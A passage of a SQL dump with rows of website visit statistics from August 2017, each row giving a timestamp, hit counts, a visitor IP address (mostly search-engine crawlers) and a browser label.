1,1,0,0,'66.249.66.155','chrome'),(140838,1501782588,1,1,0,0,'217.182.132.34','other'),(140839,1501782685,1,1,0,0,'51.255.65.97','other'),(140840,1501782834,1,1,0,0,'51.255.71.132','other'),(140841,1501782867,1,1,0,0,'217.182.132.54','other'),(140842,1501782918,1,1,0,0,'217.182.132.91','other'),(140843,1501783275,6,6,0,0,'216.244.66.246','other'),(140844,1501783352,1,1,0,0,'8.29.198.25','other'),(140845,1501783384,1,1,0,0,'217.182.132.61','other'),(140846,1501783537,1,1,0,0,'157.55.39.45','other'),(140847,1501783573,1,1,0,0,'51.255.65.58','other'),(140848,1501784252,1,1,0,0,'217.182.132.86','other'),(140849,1501784366,1,1,0,0,'217.182.132.56','other'),(140850,1501784507,1,1,0,0,'217.182.132.72','other'),(140851,1501784836,4,4,0,0,'216.244.66.194','other'),(140852,1501785027,1,1,0,0,'217.182.132.51','other'),(140853,1501785256,1,1,0,0,'81.1.242.33','other'),(140854,1501785304,1,1,0,0,'217.182.132.157','other'),(140855,1501785319,1,1,0,0,'51.255.65.41','other'),(140856,1501785607,1,1,0,0,'51.255.65.38','other'),(140857,1501785799,1,1,0,0,'207.46.13.109','other'),(140858,1501786092,1,1,0,0,'157.55.39.205','other'),(140859,1501786442,1,1,0,0,'37.112.239.120','msie'),(140860,1501786486,1,1,0,0,'217.182.132.84','other'),(140861,1501786635,1,1,0,0,'217.69.133.4','other'),(140862,1501786748,1,1,0,0,'51.255.71.120','other'),(140863,1501787154,1,1,0,0,'217.182.132.190','other'),(140864,1501787343,1,1,0,0,'91.209.11.236','other'),(140865,1501787625,1,1,0,0,'188.32.176.228','msie'),(140866,1501787788,1,1,0,0,'217.182.132.53','other'),(140867,1501787866,1,1,0,0,'51.255.65.38','other'),(140868,1501788193,1,1,0,0,'217.182.132.190','other'),(140869,1501788419,1,1,0,0,'5.164.105.248','msie'),(140870,1501788702,1,1,0,0,'217.182.132.71','other'),(140871,1501788704,1,1,0,0,'217.69.133.203','other'),(140872,1501788895,1,1,0,0,'66.249.66.157','chrome'),(140873,1501788902,1,1,0,0,'66.249.66.76','chrome'),(140874,1501789658,1,1,0,0,'51.255.65.85','other'),(140875,1501789877,1,1,0,0,'51.255.65.31','other'),(140876,1501789907,1,1,0,0,'178.93.247.42','chrome'),(140877,1501790095,4,4,0,0,'216.244.66.246','other'),(140878,1501790146,1,0,1,0,'66.249.66.157',''),(140879,1501790752,1,1,0,0,'217.182.132.4','other'),(140880,1501791401,1,1,0,0,'217.182.132.83','other'),(140881,1501791520,1,1,0,0,'217.182.132.58','other'),(140882,1501791630,1,1,0,0,'35.184.189.105','other'),(140883,1501791680,1,1,0,0,'217.182.132.176','other'),(140884,1501791724,1,1,0,0,'216.244.66.246','other'),(140885,1501791779,4,4,0,0,'216.244.66.194','other'),(140886,1501792126,1,1,0,0,'137.74.207.120','other'),(140887,1501792224,1,1,0,0,'217.182.132.78','other'),(140888,1501792575,1,1,0,0,'51.255.65.44','other'),(140889,1501792979,1,1,0,0,'66.249.66.75','chrome'),(140890,1501793041,1,1,0,0,'207.46.13.109','other'),(140891,1501793061,1,1,0,0,'164.132.162.160','other'),(140892,1501793070,1,1,0,0,'176.8.91.190','firefox'),(140893,1501793107,2,2,0,0,'66.249.66.156','chrome'),(140894,1501793593,1,1,0,0,'51.255.71.120','other'),(140895,1501794172,1,1,0,0,'51.255.65.84','other'),(140896,1501794202,1,1,0,0,'8.29.198.27','other'),(140897,1501794216,1,1,0,0,'217.182.132.82','other'),(140898,1501794294,4,4,0,0,'216.244.66.194','other'),(140899,1501794907,1,1,0,0,'217.182.132.37','other'),(140900,1501794955,1,1,0,0,'51.255.65.73','other'),(140901,1501794985,1,1,0,0,'51.255.65.54','other'),(140902,1501794992,1,1,0,0,'64.246.165.140','firefox'),(140903,1501795680,1,1,0,0,'216.244.66.237','other'),(140904,1501796047,1,1,0,0,'46.101.155.131','other'),(140905,1501796075,1,1,0,0,'51.255.71.123','other'),(140906,1501796342,3,3,0,0,'216.244.66.246','other'),(140907,1501796371,1,1,0,0,'217.182.132.23','other'),(140908,1501796895,1,1,0,0,'193.218.90.13','other'),(140909,1501797057,4,0,4,0,'66.249.66.155',''),(140910,1501797080,1,0,1,0,'66.249.66.156',''),(140911,1501797523,1,1,0,0,'66.249.66.156','chrome'),(140912,1501797609,1,0,1,0,'66.249.66.157',''),(140913,1501797741,1,1,0,0,'51.255.65.64','other'),(140914,1501797985,1,1,0,0,'51.255.65.83','other'),(140915,1501798094,1,1,0,0,'95.108.181.52','other'),(140916,1501798098,1,1,0,0,'213.180.203.14','other'),(140917,1501798176,1,0,1,0,'66.249.66.76',''),(140918,1501798540,1,1,0,0,'217.182.132.154','other'),(140919,1501798950,1,1,0,0,'37.9.113.94','other'),(140920,1501799004,1,1,0,0,'213.180.203.18','other'),(140921,1501799008,1,1,0,0,'51.255.65.42','other'),(140922,1501799214,1,1,0,0,'66.249.66.156','chrome'),(140923,1501799394,1,1,0,0,'54.165.59.7','other'),(140924,1501799472,1,1,0,0,'51.255.65.48','other'),(140925,1501799474,1,1,0,0,'217.182.132.93','other'),(140926,1501799851,1,1,0,0,'217.69.133.4','other'),(140927,1501800528,1,0,1,0,'66.249.66.75',''),(140928,1501800943,1,1,0,0,'95.108.181.60','other'),(140929,1501801173,1,0,1,0,'66.249.66.74',''),(140930,1501801269,1,1,0,0,'95.108.181.52','other'),(140931,1501801339,4,4,0,0,'216.244.66.194','other'),(140932,1501801921,3,3,0,0,'216.244.66.246','other'),(140933,1501802238,1,1,0,0,'213.180.203.43','other'),(140934,1501802612,1,1,0,0,'217.182.132.67','other'),(140935,1501802652,1,0,1,0,'66.249.66.155',''),(140936,1501802688,1,1,0,0,'51.255.65.75','other'),(140937,1501803434,1,1,0,0,'137.74.201.108','other'),(140938,1501803834,1,1,0,0,'178.154.171.53','other'),(140939,1501804305,1,1,0,0,'137.74.207.101','other'),(140940,1501804367,1,1,0,0,'51.255.65.94','other'),(140941,1501804437,3,3,0,0,'216.244.66.246','other'),(140942,1501804615,1,1,0,0,'180.76.15.33','other'),(140943,1501804983,1,1,0,0,'51.255.65.36','other'),(140944,1501805043,1,1,0,0,'8.29.198.25','other'),(140945,1501805431,10,10,0,0,'216.244.66.194','other'),(140946,1501805512,1,1,0,0,'217.69.133.3','other'),(140947,1501805722,1,1,0,0,'217.182.132.28','other'),(140948,1501805825,1,1,0,0,'66.249.66.156','chrome'),(140949,1501805845,1,1,0,0,'180.76.15.140','other'),(140950,1501806000,1,1,0,0,'213.180.203.14','other'),(140951,1501806135,1,1,0,0,'51.255.71.111','other'),(140952,1501806472,1,1,0,0,'93.104.215.169','other'),(140953,1501806515,1,1,0,0,'217.182.132.19','other'),(140954,1501806773,1,1,0,0,'51.255.71.123','other'),(140955,1501806997,1,1,0,0,'217.182.132.29','other'),(140956,1501807907,1,1,0,0,'51.255.65.32','other'),(140957,1501807929,1,1,0,0,'213.180.203.14','other'),(140958,1501808328,1,1,0,0,'37.9.113.78','other'),(140959,1501808398,1,1,0,0,'5.45.207.83','other'),(140960,1501808564,1,1,0,0,'46.161.9.39','chrome'),(140961,1501808775,4,4,0,0,'216.244.66.194','other'),(140962,1501809366,1,1,0,0,'217.182.132.24','other'),(140963,1501809541,1,1,0,0,'51.255.65.8','other'),(140964,1501809559,1,1,0,0,'217.182.132.32','other'),(140965,1501809722,1,1,0,0,'66.249.66.74','chrome'),(140966,1501810003,1,1,0,0,'51.255.65.44','other'),(140967,1501810025,1,1,0,0,'217.182.132.95','other'),(140968,1501810089,1,1,0,0,'217.182.132.172','other'),(140969,1501810291,1,1,0,0,'217.182.132.178','other'),(140970,1501810757,3,3,0,0,'216.244.66.246','other'),(140971,1501810879,1,1,0,0,'217.182.132.23','other'),(140972,1501811080,1,1,0,0,'217.69.133.2','other'),(140973,1501811459,1,1,0,0,'137.74.207.101','other'),(140974,1501811635,1,0,1,0,'66.249.66.156',''),(140975,1501811916,1,1,0,0,'51.255.65.88','other'),(140976,1501812069,1,1,0,0,'5.45.207.57','other'),(140977,1501812262,3,3,0,0,'216.244.66.246','other'),(140978,1501812714,1,1,0,0,'51.255.65.11','other'),(140979,1501812924,1,1,0,0,'216.244.66.237','other'),(140980,1501813047,1,1,0,0,'157.55.39.205','other'),(140981,1501813235,1,1,0,0,'66.249.66.157','chrome'),(140982,1501813394,1,1,0,0,'37.9.113.128','other'),(140983,1501813440,1,1,0,0,'217.182.132.69','other'),(140984,1501813527,1,1,0,0,'51.255.65.93','other'),(140985,1501813667,1,1,0,0,'213.180.203.25','other'),(140986,1501813688,1,1,0,0,'51.255.65.40','other'),(140987,1501813883,1,1,0,0,'178.154.171.42','other'),(140988,1501813942,3,3,0,0,'46.229.168.75','other'),(140989,1501813960,5,5,0,0,'46.229.168.74','other'),(140990,1501813979,2,2,0,0,'46.229.168.70','other'),(140991,1501813980,1,1,0,0,'137.74.207.102','other'),(140992,1501814025,7,7,0,0,'46.229.168.66','other'),(140993,1501814052,8,8,0,0,'46.229.168.76','other'),(140994,1501814068,2,2,0,0,'46.229.168.73','other'),(140995,1501814088,2,2,0,0,'46.229.168.79','other'),(140996,1501814162,3,3,0,0,'46.229.168.80','other'),(140997,1501814179,4,4,0,0,'46.229.168.65','other'),(140998,1501814219,1,1,0,0,'178.154.171.59','other'),(140999,1501814257,1,1,0,0,'213.180.203.14','other'),(141000,1501814332,2,2,0,0,'213.180.203.43','other'),(141001,1501814346,10,10,0,0,'46.229.168.78','other'),(141002,1501814357,7,7,0,0,'46.229.168.71','other'),(141003,1501814378,1,1,0,0,'137.74.207.161','other'),(141004,1501814437,7,7,0,0,'46.229.168.68','other'),(141005,1501814454,5,5,0,0,'46.229.168.67','other'),(141006,1501814490,6,6,0,0,'46.229.168.69','other'),(141007,1501814658,1,1,0,0,'95.108.181.57','other'),(141008,1501814687,2,2,0,0,'46.229.168.77','other'),(141009,1501814693,7,7,0,0,'46.229.168.72','other'),(141010,1501814696,1,1,0,0,'66.249.66.76','chrome'),(141011,1501814754,1,1,0,0,'51.255.65.21','other'),(141012,1501814921,2,2,0,0,'46.229.168.75','other'),(141013,1501814969,2,2,0,0,'46.229.168.74','other'),(141014,1501815059,1,1,0,0,'137.74.207.101','other'),(141015,1501815061,4,4,0,0,'46.229.168.76','other'),(141016,1501815077,4,4,0,0,'46.229.168.80','other'),(141017,1501815107,5,5,0,0,'46.229.168.79','other'),(141018,1501815116,1,1,0,0,'37.9.113.128','other'),(141020,1501815202,1,1,0,0,'66.249.66.156','chrome'),(141021,1501815258,1,1,0,0,'51.255.65.76','other'),(141022,1501815370,1,1,0,0,'46.229.168.65','other'),(141023,1501815371,5,5,0,0,'46.229.168.71','other'),(141024,1501815434,1,1,0,0,'66.249.66.157','chrome'),(141025,1501815454,5,5,0,0,'46.229.168.66','other'),(141026,1501815462,3,3,0,0,'46.229.168.73','other'),(141027,1501815554,4,4,0,0,'46.229.168.69','other'),(141028,1501815609,1,1,0,0,'46.229.168.67','other'),(141029,1501815672,1,1,0,0,'217.182.132.179','other'),(141030,1501815790,2,2,0,0,'46.229.168.72','other'),(141031,1501815845,1,1,0,0,'46.229.168.75','other'),(141032,1501815884,1,1,0,0,'8.29.198.26','other'),(141033,1501815919,1,1,0,0,'46.229.168.70','other'),(141034,1501815956,1,1,0,0,'46.229.168.68','other'),(141035,1501816012,1,1,0,0,'46.229.168.79','other'),(141036,1501816107,1,1,0,0,'51.255.65.66','other'),(141037,1501816130,1,1,0,0,'66.249.66.156','chrome'),(141038,1501816177,1,1,0,0,'5.45.207.66','other'),(141039,1501816326,2,2,0,0,'216.244.66.194','other'),(141040,1501816930,1,1,0,0,'213.180.203.25','other'),(141041,1501816934,1,1,0,0,'213.180.203.32','other'),(141042,1501817163,1,1,0,0,'66.249.66.75','chrome'),(141043,1501817194,1,1,0,0,'66.249.66.74','chrome'),(141044,1501817235,1,1,0,0,'213.180.203.43','other'),(141045,1501817555,1,1,0,0,'217.182.132.14','other'),(141046,1501817585,1,0,1,0,'66.249.66.155',''),(141047,1501817734,1,1,0,0,'178.154.171.3','other'),(141048,1501818090,1,1,0,0,'217.182.132.151','other'),(141049,1501818419,1,1,0,0,'213.180.203.42','other'),(141050,1501818565,2,2,0,0,'216.244.66.194','other'),(141051,1501818666,1,1,0,0,'66.249.66.157','chrome'),(141052,1501819165,1,1,0,0,'37.9.113.138','other'),(141053,1501819425,1,1,0,0,'51.255.65.64','other'),(141054,1501819437,1,1,0,0,'5.45.207.64','other'),(141055,1501819486,1,1,0,0,'37.9.113.128','other'),(141056,1501819624,1,1,0,0,'178.154.171.59','other'),(141057,1501819947,1,1,0,0,'51.255.65.96','other'),(141058,1501820128,1,1,0,0,'217.182.132.71','other'),(141059,1501820463,1,1,0,0,'217.182.132.81','other'),(141060,1501820536,1,1,0,0,'51.255.65.60','other'),(141061,1501820681,1,1,0,0,'217.182.132.54','other'),(141062,1501820755,1,1,0,0,'217.182.132.23','other'),(141063,1501820908,1,1,0,0,'217.182.132.153','other'),(141064,1501821054,1,1,0,0,'37.9.113.66','other'),(141065,1501821146,1,1,0,0,'178.154.171.18','other'),(141066,1501821257,1,1,0,0,'91.196.178.72','firefox'),(141067,1501821595,1,1,0,0,'66.249.66.157','chrome'),(141068,1501821802,1,1,0,0,'217.182.132.22','other'),(141069,1501822007,1,1,0,0,'51.255.65.55','other'),(141070,1501822082,2,2,0,0,'213.180.203.43','other'),(141071,1501822194,1,1,0,0,'51.255.71.133','other'),(141072,1501822203,1,1,0,0,'217.69.133.5','other'),(141073,1501822221,5,5,0,0,'216.244.66.246','other'),(141074,1501822292,1,1,0,0,'91.196.178.72','firefox'),(141075,1501822334,1,1,0,0,'217.182.132.153','other'),(141076,1501822864,1,0,1,0,'66.249.66.157',''),(141077,1501823060,1,1,0,0,'213.180.203.42','other'),(141078,1501823141,1,1,0,0,'217.182.132.182','other'),(141079,1501823254,1,1,0,0,'213.180.203.43','other'),(141080,1501823299,1,1,0,0,'91.196.178.67','chrome'),(141081,1501823485,1,1,0,0,'217.69.133.6','other'),(141082,1501823555,1,0,1,0,'66.249.66.75',''),(141083,1501823684,4,4,0,0,'216.244.66.246','other'),(141084,1501823763,1,1,0,0,'91.196.178.65','firefox'),(141085,1501824239,1,1,0,0,'37.9.113.94','other'),(141086,1501824756,1,1,0,0,'51.255.71.98','other'),(141087,1501824798,1,1,0,0,'217.182.132.94','other'),(141088,1501825103,1,1,0,0,'216.244.66.237','other'),(141089,1501825132,1,1,0,0,'95.108.181.57','other'),(141090,1501825342,1,1,0,0,'213.180.203.25','other'),(141091,1501825467,1,1,0,0,'163.172.101.182','msie'),(141092,1501825553,1,1,0,0,'213.180.203.14','other'),(141093,1501825698,2,2,0,0,'66.249.66.157','chrome'),(141094,1501825745,1,1,0,0,'51.255.71.119','other'),(141095,1501825788,1,1,0,0,'51.255.64.106','other'),(141096,1501825962,1,1,0,0,'178.154.171.59','other'),(141097,1501826046,1,1,0,0,'91.196.178.69','chrome'),(141098,1501826066,2,2,0,0,'95.108.181.60','other'),(141099,1501826074,1,1,0,0,'213.180.203.42','other'),(141100,1501826164,1,1,0,0,'91.196.178.166','chrome'),(141101,1501826374,1,1,0,0,'213.180.203.25','other'),(141102,1501826463,1,1,0,0,'51.255.65.88','other'),(141103,1501826527,1,1,0,0,'157.55.39.205','other'),(141104,1501826550,1,1,0,0,'37.9.113.78','other'),(141105,1501826597,1,1,0,0,'35.184.189.105','other'),(141106,1501826633,1,1,0,0,'217.182.132.154','other'),(141107,1501826730,1,1,0,0,'8.29.198.26','other'),(141108,1501826920,1,1,0,0,'91.196.178.102','chrome'),(141109,1501827058,3,3,0,0,'216.244.66.194','other'),(141110,1501827385,1,1,0,0,'217.182.132.50','other'),(141111,1501827589,1,1,0,0,'178.154.171.42','other'),(141112,1501827725,1,1,0,0,'95.108.181.69','other'),(141113,1501827867,1,1,0,0,'95.108.181.58','other'),(141114,1501828019,1,1,0,0,'217.182.132.170','other'),(141115,1501828078,1,1,0,0,'95.108.181.63','other'),(141116,1501828269,1,1,0,0,'51.255.64.106','other'),(141117,1501828406,1,1,0,0,'5.45.207.83','other'),(141118,1501828492,1,1,0,0,'80.254.155.43','chrome'),(141119,1501828700,1,1,0,0,'178.154.171.45','other'),(141120,1501829046,1,1,0,0,'217.69.133.194','other'),(141121,1501829075,1,1,0,0,'95.108.181.63','other'),(141122,1501829143,1,1,0,0,'188.166.81.241','chrome'),(141123,1501829154,1,1,0,0,'213.180.203.42','other'),(141124,1501829317,1,1,0,0,'66.249.66.156','chrome'),(141125,1501829358,1,1,0,0,'66.249.66.157','chrome'),(141126,1501829683,1,1,0,0,'213.180.203.14','other'),(141127,1501829930,1,1,0,0,'213.180.203.25','other'),(141128,1501830225,1,1,0,0,'217.182.132.16','other'),(141129,1501830291,5,5,0,0,'216.244.66.246','other'),(141130,1501830365,1,0,1,0,'66.249.66.156',''),(141131,1501830463,2,1,1,0,'66.249.66.156',''),(141132,1501830806,1,1,0,0,'37.9.113.138','other'),(141133,1501831137,1,1,0,0,'217.69.133.3','other'),(141134,1501831260,1,1,0,0,'37.9.113.128','other'),(141135,1501831291,1,1,0,0,'51.255.65.53','other'),(141136,1501831349,1,1,0,0,'180.76.15.33','other'),(141137,1501831546,1,1,0,0,'91.196.178.67','chrome'),(141138,1501831729,1,1,0,0,'5.45.207.66','other'),(141139,1501831784,1,1,0,0,'66.249.66.155','chrome'),(141140,1501831833,1,1,0,0,'37.9.113.138','other'),(141141,1501832053,1,1,0,0,'216.244.66.246','other'),(141142,1501832111,1,1,0,0,'178.154.171.59','other'),(141143,1501832168,1,1,0,0,'217.182.132.78','other'),(141144,1501832292,1,1,0,0,'46.161.9.39','chrome'),(141145,1501832601,1,1,0,0,'217.182.132.95','other'),(141146,1501832656,1,1,0,0,'37.9.113.78','other'),(141147,1501832770,1,1,0,0,'213.180.203.18','other'),(141148,1501832844,1,1,0,0,'95.108.181.63','other'),(141149,1501832960,1,1,0,0,'217.182.132.87','other'),(141150,1501833009,1,1,0,0,'91.196.178.167','chrome'),(141151,1501833137,1,1,0,0,'66.249.66.75','chrome'),(141152,1501833139,1,1,0,0,'178.154.171.53','other'),(141153,1501833226,1,1,0,0,'217.182.132.150','other'),(141154,1501833305,1,1,0,0,'91.196.178.71','firefox'),(141155,1501833518,1,1,0,0,'137.74.207.164','other'),(141156,1501833590,1,1,0,0,'95.108.181.69','other'),(141157,1501833820,1,1,0,0,'91.196.177.46','chrome'),(141158,1501833952,1,1,0,0,'91.196.178.67','chrome'),(141159,1501833978,1,1,0,0,'137.74.207.159','other'),(141160,1501834068,1,1,0,0,'51.255.65.10','other'),(141161,1501834087,1,1,0,0,'151.80.27.118','other'),(141162,1501834088,1,1,0,0,'51.255.65.17','other'),(141163,1501834140,1,1,0,0,'91.196.178.71','chrome'),(141164,1501834301,3,3,0,0,'216.244.66.194','other'),(141165,1501834332,1,1,0,0,'37.9.113.78','other'),(141166,1501834396,1,1,0,0,'51.255.65.69','other'),(141167,1501834544,1,1,0,0,'213.180.203.32','other'),(141168,1501834592,1,1,0,0,'217.69.133.9','other'),(141169,1501834593,1,1,0,0,'217.69.133.3','other'),(141170,1501834736,1,1,0,0,'178.154.171.59','other'),(141171,1501834916,1,1,0,0,'51.255.65.92','other'),(141172,1501835004,1,1,0,0,'46.133.132.160','chrome'),(141173,1501835082,1,1,0,0,'178.154.171.18','other'),(141174,1501835256,1,1,0,0,'5.45.207.56','other'),(141175,1501835653,1,1,0,0,'91.196.177.46','chrome'),(141176,1501835730,1,1,0,0,'51.255.65.74','other'),(141177,1501835849,2,2,0,0,'216.244.66.246','other'),(141178,1501835938,1,1,0,0,'91.196.178.67','chrome'),(141179,1501836147,1,1,0,0,'77.247.181.165','firefox'),(141180,1501836207,1,1,0,0,'217.182.132.84','other'),(141181,1501836283,1,1,0,0,'66.249.66.74','chrome'),(141182,1501836307,1,1,0,0,'95.108.181.60','other'),(141183,1501836374,2,2,0,0,'213.180.203.14','other'),(141184,1501836613,1,1,0,0,'66.249.66.157','chrome'),(141185,1501836698,1,1,0,0,'5.45.207.56','other'),(141186,1501836716,1,1,0,0,'217.69.133.203','other'),(141187,1501837108,1,1,0,0,'51.255.65.25','other'),(141188,1501837311,1,1,0,0,'213.180.203.32','other'),(141189,1501837331,1,1,0,0,'91.196.178.72','firefox'),(141190,1501837404,1,1,0,0,'5.45.207.64','other'),(141191,1501837415,1,1,0,0,'37.9.113.78','other'),(141192,1501837484,1,0,1,0,'66.249.66.155',''),(141193,1501837515,1,1,0,0,'37.53.182.125','chrome'),(141194,1501837538,1,1,0,0,'51.255.71.119','other'),(141195,1501837577,1,1,0,0,'8.29.198.25','other'),(141196,1501837844,1,1,0,0,'51.255.65.96','other'),(141197,1501838004,1,1,0,0,'66.249.66.155','chrome'),(141198,1501838260,1,1,0,0,'91.196.178.166','chrome'),(141199,1501838385,1,1,0,0,'217.182.132.77','other'),(141200,1501838498,1,1,0,0,'217.182.132.149','other'),(141201,1501838527,1,1,0,0,'46.201.175.91','firefox'),(141202,1501839364,1,1,0,0,'5.45.207.56','other'),(141203,1501839713,1,1,0,0,'217.182.132.23','other'),(141204,1501839719,1,0,1,0,'66.249.66.75',''),(141205,1501839757,1,1,0,0,'217.182.132.174','other'),(141206,1501839888,1,1,0,0,'178.154.171.59','other'),(141207,1501839995,2,2,0,0,'178.154.171.3','other'),(141208,1501840026,4,4,0,0,'216.244.66.194','other'),(141209,1501840147,1,1,0,0,'178.154.171.45','other'),(141210,1501840148,1,1,0,0,'46.201.175.91','firefox'),(141211,1501840150,1,1,0,0,'164.132.162.157','other'),(141212,1501840164,1,1,0,0,'95.108.181.52','other'),(141213,1501840172,1,1,0,0,'66.102.9.25','chrome'),(141214,1501840173,7,7,0,0,'216.244.66.246','other'),(141215,1501840309,2,2,0,0,'178.154.171.42','other'),(141216,1501840344,1,1,0,0,'91.196.177.46','chrome'),(141217,1501840358,1,1,0,0,'5.45.207.66','other'),(141218,1501840386,1,1,0,0,'95.108.181.63','other'),(141219,1501840624,1,1,0,0,'213.180.203.32','other'),(141220,1501840785,1,1,0,0,'151.80.27.116','other'),(141221,1501840908,1,1,0,0,'217.182.132.24','other'),(141222,1501840947,1,1,0,0,'46.42.174.74','msie'),(141223,1501841316,1,1,0,0,'213.180.203.14','other'),(141224,1501841333,1,1,0,0,'178.154.171.42','other'),(141225,1501841743,1,1,0,0,'91.196.177.46','chrome'),(141226,1501841935,1,1,0,0,'137.74.207.120','other'),(141227,1501842403,1,1,0,0,'213.180.203.42','other'),(141228,1501842430,1,1,0,0,'180.76.15.136','other'),(141229,1501842562,1,1,0,0,'37.9.113.78','other'),(141230,1501843273,1,1,0,0,'51.255.65.41','other'),(141231,1501843481,1,1,0,0,'217.182.132.54','other'),(141232,1501843499,1,1,0,0,'157.55.39.153','other'),(141233,1501843582,1,1,0,0,'51.255.65.91','other'),(141234,1501843583,1,1,0,0,'216.244.66.194','other'),(141235,1501843695,1,1,0,0,'51.255.71.126','other'),(141236,1501843728,14,14,0,0,'173.212.231.22','other'),(141237,1501844276,1,1,0,0,'91.196.178.165','chrome'),(141238,1501844784,1,1,0,0,'217.182.132.76','other'),(141239,1501845268,1,1,0,0,'31.43.10.21','chrome'),(141240,1501845887,1,1,0,0,'51.255.65.53','other'),(141241,1501845889,1,1,0,0,'178.154.171.18','other'),(141242,1501846008,1,1,0,0,'217.182.132.182','other'),(141243,1501846648,1,1,0,0,'91.196.178.72','firefox'),(141244,1501846763,3,3,0,0,'216.244.66.246','other'),(141245,1501847577,1,1,0,0,'217.182.132.95','other'),(141246,1501847740,1,1,0,0,'51.255.65.62','other'),(141247,1501847767,1,1,0,0,'178.154.171.53','other'),(141248,1501847810,1,1,0,0,'178.154.171.42','other'),(141249,1501847835,1,1,0,0,'213.180.203.21','other'),(141250,1501848048,1,1,0,0,'185.137.18.114','chrome'),(141251,1501848061,1,1,0,0,'213.180.203.42','other'),(141252,1501848370,1,1,0,0,'216.244.66.194','other'),(141253,1501848419,1,1,0,0,'217.182.132.17','other'),(141254,1501848431,1,1,0,0,'8.29.198.25','other'),(141255,1501848658,1,1,0,0,'51.255.65.29','other'),(141256,1501848728,1,1,0,0,'130.180.216.167','chrome'),(141257,1501848900,1,1,0,0,'91.196.178.72','firefox'),(141258,1501848929,1,1,0,0,'217.182.132.171','other'),(141259,1501849119,1,1,0,0,'178.154.171.45','other'),(141260,1501849183,5,5,0,0,'216.244.66.246','other'),(141261,1501849630,1,1,0,0,'213.180.203.32','other'),(141262,1501849636,1,1,0,0,'46.200.157.32','chrome'),(141263,1501849686,1,1,0,0,'91.225.4.65','chrome'),(141264,1501850001,1,1,0,0,'66.249.66.74','chrome'),(141265,1501850020,1,1,0,0,'217.182.132.50','other'),(141266,1501850129,1,1,0,0,'37.9.113.78','other'),(141267,1501850150,2,2,0,0,'66.249.66.157','chrome'),(141268,1501850248,1,1,0,0,'91.209.11.236','other'),(141269,1501850321,1,1,0,0,'217.182.132.157','other'),(141270,1501850527,1,1,0,0,'213.180.203.21','other'),(141271,1501850535,1,1,0,0,'51.255.71.101','other'),(141272,1501850544,1,1,0,0,'217.182.132.81','other'),(141273,1501850587,1,1,0,0,'91.196.179.134','chrome'),(141274,1501850773,1,1,0,0,'51.255.65.94','other'),(141275,1501850791,1,1,0,0,'5.45.207.64','other'),(141276,1501850812,1,1,0,0,'62.210.103.36','other'),(141277,1501851000,1,1,0,0,'51.255.65.65','other'),(141278,1501851190,2,2,0,0,'95.132.3.252','firefox'),(141279,1501851269,1,1,0,0,'176.38.38.40','chrome'),(141280,1501851337,1,1,0,0,'51.255.65.53','other'),(141281,1501851383,1,1,0,0,'157.55.39.205','other'),(141282,1501851631,1,1,0,0,'213.180.203.42','other'),(141283,1501852159,5,5,0,0,'216.244.66.194','other'),(141284,1501852417,1,1,0,0,'5.45.207.56','other'),(141285,1501852601,2,2,0,0,'91.209.11.236','other'),(141286,1501852868,1,0,1,0,'66.249.66.155',''),(141287,1501853347,1,1,0,0,'213.180.203.42','other'),(141288,1501853412,1,1,0,0,'95.108.181.69','other'),(141289,1501854320,1,1,0,0,'164.132.164.180','other'),(141290,1501854331,1,1,0,0,'66.249.66.157','chrome'),(141291,1501854476,1,1,0,0,'51.255.65.87','other'),(141292,1501854533,1,1,0,0,'51.255.65.65','other'),(141293,1501855239,1,1,0,0,'217.182.132.87','other'),(141294,1501855471,1,1,0,0,'51.255.65.17','other'),(141295,1501855473,1,1,0,0,'213.180.203.42','other'),(141296,1501855661,1,1,0,0,'217.69.133.194','other'),(141297,1501855705,5,5,0,0,'216.244.66.246','other'),(141298,1501855896,1,1,0,0,'51.255.65.80','other'),(141299,1501855981,1,1,0,0,'178.92.170.96','chrome'),(141300,1501856069,1,1,0,0,'217.182.132.7','other'),(141301,1501856139,1,1,0,0,'178.92.170.96','firefox'),(141302,1501856158,1,1,0,0,'217.182.132.50','other'),(141303,1501856380,1,1,0,0,'51.255.65.88','other'),(141304,1501856959,4,4,0,0,'216.244.66.194','other'),(141305,1501856996,1,1,0,0,'51.255.65.224','other'),(141306,1501857424,1,0,1,0,'66.249.66.157',''),(141307,1501857614,1,1,0,0,'217.182.132.177','other'),(141308,1501857668,1,1,0,0,'157.55.39.205','other'),(141309,1501857708,1,1,0,0,'217.182.132.179','other'),(141310,1501857790,1,1,0,0,'217.182.132.154','other'),(141311,1501858033,1,1,0,0,'137.74.201.100','other'),(141312,1501858368,1,1,0,0,'91.196.178.163','chrome'),(141313,1501858968,1,1,0,0,'217.69.133.3','other'),(141314,1501859268,1,1,0,0,'8.29.198.26','other'),(141315,1501859345,1,1,0,0,'66.249.66.76','chrome'),(141316,1501859427,1,1,0,0,'66.249.66.155','chrome'),(141317,1501859545,1,1,0,0,'178.154.171.59','other'),(141318,1501859609,1,1,0,0,'217.182.132.6','other'),(141319,1501859785,1,1,0,0,'51.255.65.89','other'),(141320,1501860010,1,1,0,0,'107.167.109.124','other'),(141321,1501860046,1,1,0,0,'217.182.132.70','other'),(141322,1501860164,1,1,0,0,'5.45.207.83','other'),(141323,1501860515,1,1,0,0,'213.180.203.18','other'),(141324,1501860815,1,1,0,0,'207.46.13.109','other'),(141325,1501861384,1,0,1,0,'66.249.66.74',''),(141326,1501861480,1,1,0,0,'137.74.203.194','other'),(141327,1501861518,1,0,1,0,'66.249.66.156',''),(141328,1501861825,1,1,0,0,'51.255.65.58','other'),(141329,1501862399,1,1,0,0,'217.69.133.203','other'),(141330,1501862534,1,1,0,0,'178.92.170.96','firefox'),(141331,1501862581,1,1,0,0,'204.79.180.16','msie'),(141332,1501862612,5,5,0,0,'216.244.66.246','other'),(141333,1501862889,1,1,0,0,'164.132.162.157','other'),(141334,1501863320,1,1,0,0,'66.249.66.155','chrome'),(141335,1501864175,1,1,0,0,'180.76.15.11','other'),(141336,1501864576,1,1,0,0,'51.255.65.75','other'),(141337,1501864687,1,1,0,0,'51.255.65.72','other'),(141338,1501864824,1,1,0,0,'217.182.132.5','other'),(141339,1501865175,1,1,0,0,'217.182.132.65','other'),(141340,1501865937,1,1,0,0,'178.154.171.3','other'),(141341,1501866144,1,1,0,0,'5.45.207.57','other'),(141342,1501866154,1,1,0,0,'95.108.181.52','other'),(141343,1501866575,1,1,0,0,'217.182.132.82','other'),(141344,1501866724,1,1,0,0,'51.255.65.55','other'),(141345,1501866892,1,1,0,0,'51.255.65.84','other'),(141346,1501867080,5,5,0,0,'216.244.66.194','other'),(141347,1501867616,2,2,0,0,'157.55.39.205','other'),(141348,1501867721,1,1,0,0,'217.182.132.55','other'),(141349,1501868243,1,1,0,0,'51.255.65.85','other'),(141350,1501868771,2,2,0,0,